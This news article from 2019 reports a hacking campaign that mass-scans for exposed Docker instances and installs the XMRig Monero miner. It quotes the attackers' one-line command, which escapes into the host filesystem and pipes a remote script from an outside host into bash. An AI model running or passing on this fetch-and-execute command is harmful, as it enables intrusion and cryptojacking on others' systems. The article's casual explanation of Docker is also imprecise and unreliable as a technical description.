This article was published on November 27, 2019

Hackers mass-scan for Docker vulnerability to mine Monero cryptocurrency

Its size is what caught the attention of researchers


Hackers mass-scan for Docker vulnerability to mine Monero cryptocurrency

A hacking group is reportedly performing a mass-scan of the internet in search of vulnerable ports on systems using enterprise sandbox software Docker to mine cryptocurrency.

According to security researchers at Bad Packets, the scans, which began over the weekend, identify vulnerabilities that allow bad actors to inject malicious code that deploys a cryptocurrency miner on a company’s Docker instances, ZDNet reports.

Troy Mursch, chief researcher and co-founder of Bad Packets, told ZDNet this type of activity is quite common. However, this campaign was unique because of its size.

Researchers are yet to get to grips with the entire scope of the campaign. However, as it stands, the attack is scanning over 59,000 IP networks looking for vulnerable Docker instances.

When an exposed instance is found, the below line of code is run.

chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;

This downloads a further script from the attacker’s server which then installs a cryptocurrency mining bot, Monero miner XMRig.

In the few days since hackers started scanning for exposed Docker instances, more than 14.8 Monero has been mined, about $740 worth, Mursch added.

A quick bit on Docker

If you’re not into enterprise software you might not know what Docker is, but one of TNW’s devs explained it to me as a “virtual container” in which you can run other virtual machines.

Docker itself isn’t a virtual machine though, it’s sandbox environment and does need some resources from the host machine to run properly.

It lets devs package applications and run them in virtual environments.

You can read this explainer for more information.

Get the TNW newsletter

Get the most important tech news in your inbox each week.

Also tagged with


Published
Back to top